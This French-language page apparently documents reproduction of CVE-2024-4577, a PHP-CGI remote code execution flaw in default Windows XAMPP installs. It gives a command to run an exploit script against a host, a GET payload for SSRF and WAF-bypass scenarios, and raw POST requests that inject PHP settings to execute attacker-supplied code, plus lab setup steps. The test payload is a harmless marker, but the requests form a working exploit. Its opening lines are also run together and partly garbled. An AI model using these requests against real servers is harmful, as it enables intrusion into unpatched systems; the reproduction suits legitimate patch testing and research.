
[Reproduction de vulnérabilité] Premier exploit mondial de la vulnérabilité CVE-2024-4577 PHP-CGI RCE utilisant l'environnement PHP par défaut (XAMPP).
cgi.force_redirect + REDIRECT-STATUS.data:// + requête GET.allow_url_include, auto_prepend_file, . Peut inclure n'importe quel fichier ainsi que des fichiers PHP.auto_append_fileallow_url_include, auto_prepend_file, auto_append_file.| Information | Contenu |
|---|---|
| Nom de la vulnérabilité | PHP RCE |
| Identifiant CVE | CVE-2024-4577 |
| Niveau de risque | Élevé |
| Type de vulnérabilité | RCE |
| Difficulté d'exploitation | Faible |
Utilisable dans les scénarios de contournement WAF + scénario par défaut :
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
Exemple :
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
Utilisable dans les scénarios SSRF + scénario par défaut :
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
Utilisable dans le scénario par défaut :
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
<?php die("Te"."sT");?>
Utilisable dans le scénario par défaut :
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
XAMPP Windows 8.2.12
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
Ou bien choisir une version affectée sur : https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
Aucune modification nécessaire, conserver la configuration par défaut
Tester avec les exploits ci-dessus
Vérifier si la chaîne "TesT" apparaît, ou le contenu du fichier system.ini du serveur